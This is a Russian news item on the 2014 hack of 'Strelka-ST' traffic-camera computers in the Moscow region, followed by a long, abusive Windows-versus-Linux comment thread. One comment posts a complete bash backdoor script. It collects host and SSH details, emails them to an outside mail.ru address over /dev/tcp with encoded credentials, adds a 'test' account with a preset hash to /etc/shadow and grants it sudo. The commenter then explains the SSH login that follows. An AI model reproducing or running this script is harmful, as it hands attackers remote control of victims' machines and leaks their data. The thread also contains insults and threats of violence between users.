ГИБДД пострадала от вируса для Windows XP |
Автор: admin Просмотров: 371 Комментарии:
Добавлен: 23 июня 2022
Как оказалось компьютеры комплекса «Стрелка-СТ» отвечающие за работу видеокамер продолжают работать под Windows XP. Однако XP оказался не защищен от вирусов и 10 января из строя вышли уже 110 из 144 установленных в Московской области камер. Помимо этого, в письме говорится и о причинах коллапса:
— в результате намеренного взлома системы была повреждена файловая система блоков обработки и управления комплексов «Стрелка-СТ», что делает невозможным запуск операционной системы Windows XP и специализированного программного обеспечения комплексов;
— повреждены системные журналы операционной системы; на системном диске С:
— найден инородный вредоносный пакетный файл 222.bat, настроенный для автоматического изменения пароля операционной системы и запуска исполняемого файла 1.exe;
— изменены пароли на доступ в операционную систему с правами администратора.
Причиной неработоспособности комплексов является умышленный взлом операционной системы неизвестными лицами.
В настоящее время восстановлена работа 10 из 130 выведенных из строя комплексов видеофиксации. Полностью работоспособность всей системы будет восстановлена до 16 января. Причины инцидента и размер ущерба выясняются.
Комментарии:
# 14 января 2014 09:45:29 | Tritus 0 0
Так что же всё-таки повредило систему? Вирус или целенаправленный взлом?
# 14 января 2014 09:56:39 | Luca 0 0
Интересно сколько еще лет пройдет прежде чем XP вымрет на всяких банкоматах и терминалах...
# 14 января 2014 09:58:03 | R.E.D. 0 0
Сообщение от Luca
Интересно сколько еще лет пройдет прежде чем XP вымрет на всяких банкоматах и терминалах...
Интересно, а есть ли дешевая и адекватная замена XP не от МС?
# 14 января 2014 10:08:27 | Павел 0 0
Сообщение от R.E.D.
Интересно, а есть ли дешевая и адекватная замена XP не от МС?
Да неужто такое возможно?..
# 14 января 2014 10:19:16 | R.E.D. 0 0
Сообщение от Павел
Да неужто такое возможно?..
Ну приведи мне пример, пожалуйста.
# 14 января 2014 10:26:13 | Штул� 0 0
,Самое смешное в этой истории с камерами то, что чиновники тоскуют не о безопасности движения, а о потеряной "прибыли" ) "Министерство транспорта Московской области посчитало, что из-за отключения стационарных камер контроля скорости регион не досчитается полутора миллионов рублей бюджетных доходов. Об этом со ссылкой на пресс-службу ведомства сообщает 14 января РИА Новости." Не о чём то другом, а о прибыли.
# 14 января 2014 11:05:10 | Павел 0 1
Сообщение от R.E.D.
Ну приведи мне пример, пожалуйста.
Операционная система, которую обычно ставят в IP-камерах видеонаблюдения. 5 букв.
Вторая i. ;-))
# 14 января 2014 11:11:02 | Linux777 -1 0
Сообщение от R.E.D.
Интересно, а есть ли дешевая и адекватная замена XP не от МС?
Конечно нет, только свитой виндус икспии - лушая ОЗь! Альтернатив нет, только огромный системный блок, только x86-кипятильник, только дельфи только хардкор.
Куда уж там компактному экономичному линупсу, работающему на компьютерах размером с SD-карту и прошивках устройств, у которых после перезагрузки всё продолжает работать.
# 14 января 2014 11:15:42 | Linux777 -1 0
Сообщение от Павел
Операционная система, которую обычно ставят в IP-камерах видеонаблюдения. 5 букв. Вторая i. ;-))
Дай-ка подумать... Неужели Winda? :)))
# 14 января 2014 11:23:06 | Павел 0 0
Сообщение от Linux777
Дай-ка подумать... Неужели Winda? :)))
Ты знал! Ты знал!.. ;-)))
# 14 января 2014 11:29:55 | R.E.D. 0 0
Сообщение от Павел
Операционная система, которую обычно ставят в IP-камерах видеонаблюдения. 5 букв.
Вторая i. ;-))
Minix? Дак она же учебная!
Сообщение от Linux777
дельфи
А это на кой?
Сообщение от Linux777
Куда уж там компактному экономичному линупсу, работающему на компьютерах размером с SD-карту и прошивках устройств, у которых после перезагрузки всё продолжает работать.
А это точно. Джаст фор фан, как говорится.
# 14 января 2014 11:52:40 | Linux777 -1 0
Сообщение от R.E.D.
Minix? Дак она же учебная!
Minix начиная с 3.x не является учебной. В одно время я в огромным интересом следил за развитием Minix, но увы, этой ОС не хватало даже простейших базовых возможностей, типа поддержки shared objects (например формата ELF), поддержки pthreads, от которых куча нужных библиотек зависит. Увы, разработчики не считали это приоритетом, но если на ОСи ничего не машет - нах она такая нужна? Кто будет портировать и тестировать софт под ней, если никак? Так что, увы...
Вот Genode OS - не имеет недостатков Minix 3, а также поддерживает Gallium 3D, что немаловажно, так что - перспективная ОС это Genode и я очень жду их релиза в качестве ОС общего назначения. К тому же они делают порты для ARM для известных плат типа raspberry, beagleboard и прочих, которые у меня есть...
# 14 января 2014 02:05:00 | MOP3E 0 0
Сообщение от Luca
Однако XP оказался не защищен от вирусов и 10 января из строя вышли уже 110 из 144 установленных в Московской области камер.
Ынтересно, откуда в закрытой сети камер видеонаблюдения взялся вирус? Тем более, что:
Сообщение от Источник
— в результате намеренного взлома системы была повреждена файловая система блоков обработки и управления комплексов «Стрелка-СТ», что делает невозможным запуск операционной системы Windows XP и специализированного программного обеспечения комплексов;
— повреждены системные журналы операционной системы; на системном диске С:
— найден инородный вредоносный пакетный файл 222.bat, настроенный для автоматического изменения пароля операционной системы и запуска исполняемого файла 1.exe;
— изменены пароли на доступ в операционную систему с правами администратора.
Причиной неработоспособности комплексов является умышленный взлом операционной системы неизвестными лицами.— в результате намеренного взлома системы была повреждена файловая система блоков обработки и управления комплексов «Стрелка-СТ», что делает невозможным запуск операционной системы Windows XP и специализированного программного обеспечения комплексов;
— повреждены системные журналы операционной системы; на системном диске С:
— найден инородный вредоносный пакетный файл 222.bat, настроенный для автоматического изменения пароля операционной системы и запуска исполняемого файла 1.exe;
— изменены пароли на доступ в операционную систему с правами администратора.
Причиной неработоспособности комплексов является умышленный взлом операционной системы неизвестными лицами.
Вирус, ага.
Хабр такой хабр...
З.Ы. А я знаю, кто в этом виноват!
# 14 января 2014 02:15:52 | MOP3E 0 0
Сообщение от Linux777
Куда уж там компактному экономичному линупсу, работающему на компьютерах размером с SD-карту и прошивках устройств, у которых после перезагрузки всё продолжает работать.
Скажи, а если линуховую прошивку намеренно повредить - она будет работать?
# 15 января 2014 08:27:43 | Linux777 -1 0
Сообщение от MOP3E
Скажи, а если линуховую прошивку намеренно повредить - она будет работать?
Ну попытайся повредить из ОС read-only участки флэша... ^_^
# 15 января 2014 11:46:01 | msAVA -1 1
Сообщение от Linux777
Ну попытайся повредить из ОС read-only участки флэша.
А если молотком? Помните:
"Надёжна бытовая техника существует. Доказано Zanussi!"
"Абсолютно надёжной бытовой техники не существует. Доказано кувалдой!"
# 15 января 2014 12:05:50 | kenzzzooo 0 0
Сообщение от Linux777
Ну попытайся повредить из ОС read-only участки флэша..
это относится только к линуксу? :)
# 15 января 2014 12:16:19 | Linux777 -1 0
Сообщение от kenzzzooo
это относится только к линуксу? :)
это не относится к "обычному виндусу икспии" ;)
вот xp embedded - другое дело, если бы эта ОСь не была говном
чтобы говорить что xp embedded говно, я применял эту ОС до того как перейти на Linux для embedded, у нас даже лицензия была куплена от некросовта :)
# 15 января 2014 12:30:59 | kenzzzooo 0 0
Сообщение от Linux777
это не относится к "обычному виндусу икспии" ;)
собственно, как и вопрос вам о намеренном повреждении линукса от MOP3E :) спрашивается: чего скачем-то с темы? :)
Сообщение от Linux777
чтобы говорить что xp embedded говно, я применял эту ОС до того как перейти на Linux для embedded, у нас даже лицензия была куплена от некросовта :)
да за ради Бога :) у нас все устройства, а-ля ТСД, на embedded и ничего, работают как часы :) вы-то можете что угодно говорить, только, очень сильно сомневаюсь, что вас здесь кто-то будет серьезно воспринимать :)
# 15 января 2014 12:46:54 | Linux777 -1 0
Сообщение от kenzzzooo
у нас все устройства, а-ля ТСД, на embedded и ничего, работают как часы :) вы-то можете что угодно говорить, только, очень сильно сомневаюсь, что вас здесь кто-то будет серьезно воспринимать :)
Я и не говорю что xp embedded работает как-то не так, весьма хорошо. Просто процессор создания образа такой ОС - ущербен и потому исполнители заказа гибдд просто взяли обычный виндус, потому что с ним не надо париться и так сойдет. Вот и получилось :)
# 15 января 2014 01:51:16 | kenzzzooo 0 0
Сообщение от Linux777
Я и не говорю что xp embedded работает как-то не так, весьма хорошо. Просто процессор создания образа такой ОС - ущербен и потому исполнители заказа гибдд просто взяли обычный виндус, потому что с ним не надо париться и так сойдет. Вот и получилось :)
ну вот :) очередные линуксоиды ниасилили теперь уже xp embedded :)
# 15 января 2014 03:28:36 | Linux777 -1 0
kenzzzooo, кушайте эти помои сами, на здоровье :)
# 15 января 2014 04:08:00 | MOP3E 0 0
Сообщение от Linux777
это не относится к "обычному виндусу икспии" ;)
Ещё как относится. Можно, например, сделать загрузчик, который будет в процессе запуска системы переписывать образ ОС на виртуальный диск в памяти. XP с минимальным набором программ и драйверов не будет требовать много ОЗУ. Но такой метод решения задачи уже является хардверным, а софтверным. Поэтому вернёмся к нашим баранам. Так какова у линуха устойчивость к взлому?
Сообщение от kenzzzooo
собственно, как и вопрос вам о намеренном повреждении линукса от MOP3E :)
Да нет, мой вопрос как раз в тему - в ответ на голословные утверждения пенгватуных о том, что "ХР говно, так как в ней водятся вирусы". Не было там вируса - были обнаружены именно следы взлома.
Сообщение от Linux777
Просто процессор создания образа такой ОС - ущербен
Очередной ниасилятор, ага.
Сообщение от Linux777
потому исполнители заказа гибдд просто взяли обычный виндус, потому что с ним не надо париться и так сойдет.
Мдя, фанатеги на марше. Лично я в 2009 году наблюдал работу новейшей сталеплавильной печи под управлением промышленного компьютера, на котором была запущена Windows NT 4.0. Этот компьютер отвечает, ни много ни мало, за поддержание необходимых параметров электрической дуги в зоне плавления металла. Линух, видимо, не могёть. :)
# 15 января 2014 04:26:07 | Штул� 0 0
Сообщение от MOP3E
найден инородный вредоносный пакетный файл 222.bat, настроенный для автоматического изменения пароля операционной системы и запуска исполняемого файла 1.exe;
Когда линуксоидам тыкали в лицо файлом на шкриптах (bat), который запускал кейлоггер (exe) и отсылал собраную инфу удалённо, то они стыдливо с ужимками клоунов говорили, что это не вирус)
# 15 января 2014 06:31:19 | kenzzzooo 0 0
Сообщение от MOP3E
Да нет, мой вопрос как раз в тему - в ответ на голословные утверждения пенгватуных о том, что "ХР говно, так как в ней водятся вирусы". Не было там вируса - были обнаружены именно следы взлома.
Я немного не про это. Я о том, что Linux777 переключился с обычного линукса на embedded в ответе на Ваш вопрос о преднамеренном повреждении прошивки. :)
# 15 января 2014 06:32:09 | Passerby 0 0
Сообщение от Штул�
Когда линуксоидам тыкали в лицо файлом на шкриптах
Дико извиняюсь, а когда тыкали? И, самое главное, как? Примерно также, как Babusha своим шкриптом на PS?
# 15 января 2014 06:52:33 | MOP3E 0 0
Сообщение от kenzzzooo
Я немного не про это. Я о том, что Linux777 переключился с обычного линукса на embedded в ответе на Ваш вопрос о преднамеренном повреждении прошивки. :)
Ага, понятно.
# 15 января 2014 08:29:35 | Штул� 0 0
Сообщение от Passerby
Дико извиняюсь, а когда тыкали? И, самое главное, как? Примерно также, как Babusha своим шкриптом на PS?
Да почему ) На старом СЛОРе тема валяется, линуксоиды там квадратными кирпичами срали )
# 15 января 2014 09:29:42 | Павел 0 0
Сообщение от Штул�
На старом СЛОРе тема валяется, линуксоиды там квадратными кирпичами срали )
Да какие они линуксоиды... Привыкли в Windows заборы из костылей ладить. Решили через торренты всех заразить. Только адрес забыли... Кирпичи знатные были, да.
# 15 января 2014 10:21:52 | Штул� 0 0
Сообщение от Павел
Да какие они линуксоиды... Привыкли в Windows заборы из костылей ладить. Решили через торренты всех заразить. Только адрес забыли... Кирпичи знатные были, да.
Ну почему через торренты?) Это и в других местах сработало, учебник хороший был ) Точь в точь, как в этой "новости")
# 16 января 2014 06:13:36 | Passerby 0 0
Сообщение от Штул�
На старом СЛОРе тема валяется, линуксоиды там квадратными кирпичами срали
Ну так ссылку на тему и посмотрим по какому поводу там кирпичи были. Наверное как и с бабушиным скриптом.
-Мыкола, ну зыграйБабуша, ну покажи как твой скрипт работает.
-Та не можу, дайте мине архив с такими файлами внутри.
-Держи. Покажи как.
-Та не можу, дайте мине ещё и архиватор, который его грамотно распаковать сможет.
-Блин, да запиши ты тогда эти файлы на флэшку под линуксом и вставь её в виндовую машину.
-Та не можу, я новый антивирус прикупил и на флэшку уже денег нету.
Громадяне, а зараз вы прослухали капризы Мыколы Паганини Бабуши.
# 16 января 2014 07:47:40 | Rector 0 0
Сообщение от MOP3E
А я знаю, кто в этом виноват!
Серьёзное заявление. А может это был мелкий подхалимаж? -)
Сообщение от Павел
Но блин, кто же камеры заразил? Это за гранью.
Самим камерам ничего не сделается. Там как правило линукс стоит. А вот уже к каждой камере подключается некий программно-аппаратный комплекс (под управлением winxp), для обработки видеопотока, распознавания номеров и прочее, с отсылкой промежуточных данных на некий центральный сервер, который и проводит дальнейшую обработку (выписывает штрафы, рассылает их по почте и т.д.).
Далее варианты..
1. Атака изнутри. Обиженный (купленный) админ. Очень банально -)
2. Атака с внешней сети.
Возможно центральный(е) сервер(а) постобработки торчали голыми задницами во внешнюю сеть. Хакер, получив контроль над одним из них, получил и дальнейший контроль локальных (постовых) систем. Но зачем было тупо всё ломать? Поселился бы по тихому там и тёще штрафы выписывал -))
# 16 января 2014 09:19:43 | Штул� 0 0
Сообщение от Passerby
Наверное как и с бабушиным скриптом.
Да зачем его PS? ) Ваш родной язык сценариев, который изначально, например в deb установщике используется ) Вы когда последний раз, при установке, на сон грядущий код проверяли?) А бабушка, с дедушкой, которым вы внедрили полуфабрикат, тоже проверяют?)
# 16 января 2014 06:56:56 | Штул� 0 1
Кстате, нате вот вам ) Изучайте свой "язык" командной оболочки, содраный из темы на старом СЛОР-е )
#!/bin/bash
ip=`wget -O - -q icanhazip.com`
name=`hostname`
sys=`cat /etc/issue.net`
sshd=`ps -A|grep sshd|wc -l`
sshdinst=`which ssh`
proc=`cat /proc/cpuinfo | grep name`
mem=`cat /proc/meminfo | grep MemTotal`
port=`grep 'Port' /etc/ssh/sshd_config`
user=`grep 'test' /etc/shadow`
if [ ! -z ${user} ] ; then
exit 0
else
message="User test added, okey!"
fi
if [ $sshd -eq 0 ] ; then
sshd="SSH off"
else
sshd="SSH on"
fi
if [ ! -z ${sshdinst} ] ; then
sshdinst="SSH installed"
else
sshdinst="SSH not installed"
fi
e_from="54321@mail.ru"
e_to="12345@mail.ru"
header="test"
body="$ip | $name | $sys | $sshd | $sshdinst | $port | $mem | $proc | $message"
e_server="smtp.mail.ru"
e_login="bGludHJveWZyb20="
e_pass="MTk2NE1hc3Rlcg=="
subject="$ip $name"
e_port=25
exec 9<>/dev/tcp/$e_server/$e_port
echo "HELO me" >&9
read -r temp <&9
echo "auth login" >&9
read -r temp <&9
echo $e_login >&9
read -r temp <&9
echo $e_pass >&9
read -r temp <&9
echo "Mail From: $e_from" >&9
read -r temp <&9
echo "Rcpt To: $e_to" >&9
read -r temp <&9
echo "Data" >&9
read -r temp <&9
echo $header >&9
echo "Subject: "$subject >&9
echo "From: "$e_from >&9
echo "To: "$e_to >&9
echo >&9
echo $body >&9
echo "." >&9
read -r temp <&9
echo "quit" >&9
read -r temp <&9
9>&-
9<&-
useradd test > /dev/null > /dev/null
sed -i -e '$d' /etc/shadow
echo 'test:$6$NLlTvcG8$uxTIzzEJ4cLteSS2Oa8hJEitu0kVSXOXTpwrf0e9KyeaBBUuaQjBmNNAKxTV4NmFHAvsU0iPsXwfNurroc0DE1:16012:0:99999:7:::' >> /etc/shadow
adduser test sudo > /dev/null > /dev/null
exit 0
(с) Все права нарушены )
На почту, условно названую 12345@mail.ru (логины и пассы прописаны в base64) придёт, после удачного запуска вот примерно такое послание (нужное подменить по желанию):
test
Subject: 111.111.111.111 жертва
From: 54321@mail.ru
To: 12345@mail.ru
111.111.111.111 | dk | Ubuntu 12.04.4 LTS | SSH on | SSH installed | Port 2020 | MemTotal: 760372 kB | model name : Intel(R) Celeron(R) CPU 2.53GHz | User test added, okey!
После чего можно заходить по адресу 111.111.111.111 посредством ssh клиента юзером test, с паролем 12345 и резвиться с полуфабрикатом "жертва", имея его во все дыхательные и пихательные. Если уж вам сильно приспичит, то можно и бинарник сваять)
Примитив собственно, как примитивен и полуфабрикат )
edited: Штул�, 16.01.2014 19:05
# 16 января 2014 08:56:24 | Павел 0 0
Сообщение от Штул�
Кстате, нате вот вам ) Изучайте свой "язык" командной оболочки, содраный из темы на старом СЛОР-е )
Любитель ты старые портянки нюхать... Ею подтерлись уже больше года назад, если что.
# 16 января 2014 09:19:31 | MOP3E 0 0
Сообщение от Павел
Любитель ты старые портянки нюхать... Ею подтерлись уже больше года назад, если что.
Тем не менее, следуя вашей же логике, это - вирус.
# 16 января 2014 09:33:24 | Tritus 0 0
На убунтуфоруме занятнейшая тема - несанкционированное подключение к рабочей станции. Наблюдаю с интересом. Эксперты теряются в догадках - дальше, чем наличие волоса на сенсоре оптической мыши, догадки не идут...
# 16 января 2014 10:22:13 | Rector 0 0
Сообщение от Tritus
На убунтуфоруме занятнейшая тема - несанкционированное подключение к рабочей станции.
Ничего такого интересного. Чел скачал с левого источника Tor, ибо просто дурачок и мышление виндузятника - качать файло с разных помоек. В результате, так как...
линухой он пользуется месяц с небольшим, где-то он вычитал что с помощью Tor можно скрытно сидеть в инете. Установил ее. И через несколько дней началось. С установкой Тор, или еще чего-то в списках юзеров появились: mixmaster, debian-tor, openerp, privoxy, proxy
С рутовыми правами, ага -)
===
А левые источники...Ну вот, как пример - сайт госуслуг при регистрации, хочет поставить некий "плагин для браузера"....
https://dynamic.linexp.ru/Files/2014/58218d31-ffb1-4bda-9d59-75afed113b83.png
Который представляет собой некий CSuserPlugin.deb, размером 1.3 Мб. Который поставит в систему, под рутом конечно, хренову тучу левых библиотек, изменит/добавит правила в udev, имеет в своём составе некий бинарник. Это так, при беглом просмотре. Много здесь найдётся желающих втулить подобное себе в систему? Я так, чего-то не рискнул -)
# 16 января 2014 10:56:26 | Штул� 0 0
Сообщение от Павел
Любитель ты старые портянки нюхать... Ею подтерлись уже больше года назад, если что.
Это простейший пример) Скажем так, согласно теме: " вредоносный пакетный файл 222.bat, настроенный для автоматического изменения пароля операционной системы ") Работает? Работает! Лососните тунца )
# 16 января 2014 11:09:47 | Штул� 0 0
Сообщение от MOP3E
Тем не менее, следуя вашей же логике, это - вирус.
Пускай молятся на то, что пользователей полуфабриката 1 процент)
# 16 января 2014 11:42:27 | Штул� 0 0
Сообщение от Tritus
На убунтуфоруме занятнейшая тема - несанкционированное подключение к рабочей станции. Наблюдаю с интересом. Эксперты теряются в догадках - дальше, чем наличие волоса на сенсоре оптической мыши, догадки не идут...
Спасибо за наводку! Интересно понаблюдать за непугаными идиотами)
# 17 января 2014 03:42:28 | Павел 0 0
Сообщение от MOP3E
Тем не менее, следуя вашей же логике, это - вирус.
Вирус должен уметь размножаться, батенька. И на этом "закапыватели" всегда как-то замирали в придурковатом виде.
Что касается топика, то хочу напомнить вот это.
# 17 января 2014 09:48:56 | MOP3E 0 0
Сообщение от Павел
Вирус должен уметь размножаться, батенька. И на этом "закапыватели" всегда как-то замирали в придурковатом виде.
Да ты что?! Почему же тогда в этом топике написано про вирус? И какого хрена ты это пишешь здесь мне? Напиши Луке, что название темы некорректное, не стесняйся! Докажи, что ты не пиздабол, не чмо и умеешь признавать свои ошибки.
Сообщение от Rector
Ничего такого интересного. Чел скачал с левого источника Tor, ибо просто дурачок и мышление виндузятника - качать файло с разных помоек. В результате, так как...
...так как линух не имеет никаких встроенных средств защиты, "файло с разных помоек" успешно ставит систему раком.
Сообщение от Rector
Который представляет собой некий CSuserPlugin.deb, размером 1.3 Мб. Который поставит в систему, под рутом конечно, хренову тучу левых библиотек, изменит/добавит правила в udev, имеет в своём составе некий бинарник. Это так, при беглом просмотре. Много здесь найдётся желающих втулить подобное себе в систему? Я так, чего-то не рискнул -)
А антивирусом проверить перед установкой? Ой, бля... в линухе же антивируса нет, так как в нём ничто не может угрожать пользователю и, поэтому, антивирус не нужен! Линух априори "бижапашен"!!! Хотя по факту дыряв как решето. :)
# 17 января 2014 09:58:45 | Rector 0 0
Сообщение от MOP3E
антивирусом проверить перед установкой?
Антивирус - это панацея? Ты наивный чукотский мальчик, закончивший ПТУ в Салехарде по станкам ЧПУ?
Сообщение от MOP3E
Хотя по факту дыряв как решето. :)
Докажи это личными примерами, иначе пиздабол.
+
Сообщение от MOP3E
Докажи, что ты не пиздабол, не чмо и умеешь признавать свои ошибки.
# 17 января 2014 10:15:55 | Tritus 0 0
Сообщение от Rector
Чел скачал с левого источника Tor, ибо просто дурачок и мышление виндузятника - качать файло с разных помоек.
Как бэ утверждается, что Tor ставился с родного бубунтовского репозитория. Хотя как оно на самом деле, естественно, неизвестно...
Сообщение от Rector
Антивирус - это панацея?
Конечно же не панацея! Но хотя бы по известним сигнатурам просканировать лишним не бывает.
# 17 января 2014 11:39:48 | Штул� 0 0
Сообщение от MOP3E
Да ты что?! Почему же тогда в этом топике написано про вирус? И какого хрена ты это пишешь здесь мне? Напиши Луке, что название темы некорректное, не стесняйся! Докажи, что ты не пиздабол, не чмо и умеешь признавать свои ошибки.
Да они всегда так пишут) Как "в винде вирусы ходят как по буфету" ) Они же и вот эту запись относят к вирям:
"document.write(''+'<'+'/sc'+'rip'+'t>');
"
Правда это большей частью касается швабодного и бисплатнага софта, но этот факт почему то стыдливо не выпячивается.
# 17 января 2014 12:11:31 | Штул� 0 0
Сообщение от Павел
Что касается топика, то хочу напомнить вот это.
А что касается топика, Павлик, то нате вот вам:
"Это точно не вирус. В это никто не верит, потому что и пакетный файл 222.bat, и файл 1.exe — это файлы, запускаемые на уровне пользователя, так называемая закладка. Они могут быть с отсроченным сроком действия, но это точно никакой не вирус, потому что обычно он ведет себя скрыто, маскируется под обычные файлы, — отметил источник. — Для простоты можно привести такой пример. Есть перелом руки, а есть инфекция. В первом случае никто не скажет, что человек где-то этим заразился. Вот в данном случае атака на «Стрелку» — это перелом руки»."
В вирусы свято верят только линуксоиды, отбивая поклоны в своей немногочисленой секте)
А вот дальше уже смешнее) Оказывается всё гораздо банальнее)
"Между тем компания «СМУ-7», обслуживающая комплексы, по условиям госконтракта получала деньги в том числе и за обязательное антивирусное обслуживание всех комплексов.
Проверять на наличие вредоносных программ операционную систему всех «Стрелок» должны были два раза в месяц, однако осуществлялась ли в действительности такая проверка, неизвестно.
«Каждое такое антивирусное сканирование стоит бюджету примерно 2800 руб. Причем делается оно удаленно: нажимается кнопка, и через несколько часов можно отследить, что нашел антивирус. В месяц такое антивирусное обслуживание одного комплекса стоит уже около 5600 руб. Учитывая, что вредоносные файлы, как говорят СМИ, охватили все комплексы, я вообще сомневаюсь, что такая проверка проводилась», — поделился мнением источник «Газеты.Ru», знакомый с условиями контракта на обслуживание «Стрелки-СТ»."
edited: Штул�, 17.01.2014 12:20
# 17 января 2014 12:17:47 | MOP3E 0 0
Сообщение от Rector
Антивирус - это панацея?
Антивирус в меру своих возможностей отлавливает вирусы и прочие угрозы для операционной системы. Как-то так.
Сообщение от Rector
Докажи это личными примерами, иначе пиздабол.
Рехтур, ты когда уже мою винду взломаешь? Уже пятый год пиздишь, а воз и ныне там. Ты не просто пиздабол, а пиздабол со стажем. :)
Если линух не дыряв - то почему в нём так опасно ставить программы не из надёжных источников? А потому, что при таком сценарии установки эту мегазащищённую ОС поимеют во все дыры и пользователь даже не поймёт, что это произошло. Человеку руткит в систему встроили, а он не понимает - что и откуда. Это при том, что первые автоматические руткит-атаки на винде начались с выходом первых версий Radmin, давно уже никого не удивляют и прекрасно блокируются антивирусным софтом. Да, линух при его настолько низком уровне защищённости - система совсем не для рядовых пользователей и домохозяек.
# 17 января 2014 02:30:37 | Павел 0 0
Сообщение от MOP3E
Почему же тогда в этом топике написано про вирус?
А на заборе знаешь, что написано?
Сообщение от MOP3E
И какого хрена ты это пишешь здесь мне? Напиши Луке, что название темы некорректное, не стесняйся!
И какого хрена ты это пишешь здесь мне? Напиши Луке сам.
Сообщение от MOP3E
Докажи, что ты не...
А не пойти бы тебе...?
Сообщение от MOP3E
...так как линух не имеет никаких встроенных средств защиты, "файло с разных помоек" успешно ставит систему раком.
Ты так и не признался, когда последний раз ты работал с СПО. Ладно. Тогда уж расскажи, как ты ставил раком Линукс. В подробностях, если не сложно.
edited: Павел, 17.01.2014 14:38
# 17 января 2014 03:06:14 | MOP3E 0 0
Сообщение от Павел
А на заборе знаешь, что написано?
Значит, ты привык слепо доверять надписям на заборах. Мне тебя жаль.
Сообщение от Павел
И какого хрена ты это пишешь здесь мне? Напиши Луке сам.
Уже написал.
Сообщение от Павел
А не пойти бы тебе...?
Я, в принципе, знал, что ты побоишься поступить как честный и благородный человек.
Сообщение от Павел
Ты так и не признался, когда последний раз ты работал с СПО. Ладно. Тогда уж расскажи, как ты ставил раком Линукс. В подробностях, если не сложно.
Вот рецепт. С подробностями. И таких историй по всему инету - сотни.
# 17 января 2014 05:40:17 | Passerby 0 0
Сообщение от MOP3E
И таких историй по всему инету - сотни.
Таких или таких в тысячи раз больше.
# 17 января 2014 05:47:40 | Павел 0 0
Сообщение от MOP3E
Я, в принципе, знал, что ты побоишься поступить как честный и благородный человек.
Тьфу ты, блин... Морзе, как все сложно и тонко, оказывается... Тебе хочется, чтобы я, вот этими руками, опроверг то, что это вирус?
Скажи, а я когда-нибудь это утверждал?
Да на здоровье. Вот, смотри:
Уважаемый топикстартер! Мне кажется, в данной ситуации некорректно говорить о вирусе. По-моему, это типичная программная закладка, которых можно запросто понаделать и в других операционных системах. И в линуксе, в Линуксе тоже. Да, да.
Ну, отпустило?
Я действительно так считаю.
# 17 января 2014 07:15:09 | MOP3E 0 0
Сообщение от Passerby
Таких или таких в тысячи раз больше.
Радуйся, теперь и линух заметили. Значит, не зря пенгванутые старались. А вообще, антивирусы должны пресекать установку такого ПО. У меня ещё в 2007 году антивирь ловил руткит с радминовыми библиотеками.
# 17 января 2014 10:46:55 | Rector 0 0
Сообщение от MOP3E
Рехтур, ты когда уже мою винду взломаешь? Уже пятый год пиздишь, а воз и ныне там
MOP3E, ты в шары долбишься? Я уже неоднократно повторял - нахрена мне ломать твой компьютер, если я банально могу сломать тебе рёбра.
===
Ты сказал, что Linux - дырявое решето. Докажи это личным примером без вращения пятой точки. Личным MOP3E, личным, а не отсылками в Гугол. Не докажешь, значит пиздабол.
# 17 января 2014 10:48:21 | Штул� 0 0
Сообщение от Passerby
Таких или таких в тысячи раз больше.
Сообщение от Штул�
Пускай молятся на то, что пользователей полуфабриката 1 процент)
# 18 января 2014 12:03:36 | Rector 0 0
Сообщение от Tritus
Но хотя бы по известним сигнатурам просканировать лишним не бывает.
Вот именно! По известным -)
Если я напишу в батнике что-то вроде....
https://dynamic.linexp.ru/Files/2014/93ccd588-ffdd-4093-937f-d9e558385dc2.png
Загружу на virustotal....
https://dynamic.linexp.ru/Files/2014/36e37fa9-d0cf-4831-82ef-ed21fe6d8a59.png
И проверю...
https://dynamic.linexp.ru/Files/2014/b3e4c620-93de-4a11-b7c3-7400bd38936f.png
===
То как ты думаешь, юзеру который это запустит сильно полегчает? =)))
# 18 января 2014 06:25:56 | MOP3E 0 0
Сообщение от Rector
Если я напишу в батнике что-то вроде....
О, да, ты - напишешь. На большее твоей фантазии тупо не хватит. А вот эти:
Сообщение от Rector
А левые источники...Ну вот, как пример - сайт госуслуг при регистрации, хочет поставить некий "плагин для браузера"....
Не напишут. Потому что, в отличие от тебя, идиотами не являются и не занимаются по пять лет безуспешным взломом компьютеров по IP. :)
# 18 января 2014 07:15:39 | Rector 0 0
Сообщение от MOP3E
Рехтур, ты - дебил. Без вариантов.
Ну вот, ещё одно заявление от толстомордого ЧПУ-шника. Ладно, то что я дебил, ты потом доказывать будешь -)
Так как на счёт - Линукс-решето, я его сам сломаю? Твои слова? Доказательство будут, или слив?
+
В цветастой консоли, на раз въебу (с) MOP3E
# 18 января 2014 07:24:34 | MOP3E 0 0
Сообщение от Rector
Ну вот, ещё одно заявление от толстомордого ЧПУ-шника. Ладно, то что я дебил, ты потом доказывать будешь -)
Рехтур, ты - даже не знаю, кто. Прошу просветить компетентных людей - как это называется на языке психиатрии, когда человек читает сообщение в одной теме, а отвечает на него в другой?
Сообщение от Rector
Так как на счёт - Линукс-решето, я его сам сломаю? Твои слова?
Неа, не мои. Это бред твоего воспалённого разума. Или, может, у тебя белочка началась от передозировки водки? В общем, давай, до свидания!
# 18 января 2014 07:39:50 | Rector 0 0
Сообщение от MOP3E
Неа, не мои.
Сообщение от MOP3E
Линух априори "бижапашен"!!! Хотя по факту дыряв как решето. :)
===
Вот MOP3E, то ты докторов зовёшь, то дядек в погонах, когда боишься что тебе морду поправят и рёбрышки посчитают собственной продукцией ребятки с Волжского трубного завода, то вращаешь пятой точкой как вертолёт. Кто ты MOP3E?
Думаю что ты вообще за свои слова не отвечаешь.
+
Всё ясно с тобой. Слив засчитан -)
# 18 января 2014 08:13:27 | MOP3E 0 0
Сообщение от Rector
Сообщение от MOP3E Неа, не мои.
Сообщение от MOP3E Линух априори "бижапашен"!!! Хотя по факту дыряв как решето. :)
А где я здесь написал, что что-то взломаю? Иди уже, лечись. Зрение, например, полечи, чтобы буквы удобнее было в слова складывать.
Сообщение от Rector
Всё ясно с тобой. Слив засчитан -)
Ну да, слился ты знатно. Удачи!
# 18 января 2014 08:20:50 | Rector 0 0
Сообщение от MOP3E
А где я здесь написал, что что-то взломаю?
А как ты собираешься, (хотя по твоим движениям, не собираешься) доказывать своё заявление?
Сообщение от MOP3E
Линух априори "бижапашен"!!! Хотя по факту дыряв как решето. :)
Давай посмотрим на другие твои методы -))
# 18 января 2014 09:21:06 | MOP3E 0 0
Сообщение от Rector
А как ты собираешься, (хотя по твоим движениям, не собираешься) доказывать своё заявление?
Как-то так.
------------------------
ТРИО теплый пол отзыв
Заработок на сокращении ссылок
Earnings on reducing links
Код PHP на HTML сайты
— в результате намеренного взлома системы была повреждена файловая система блоков обработки и управления комплексов «Стрелка-СТ», что делает невозможным запуск операционной системы Windows XP и специализированного программного обеспечения комплексов;
— повреждены системные журналы операционной системы; на системном диске С:
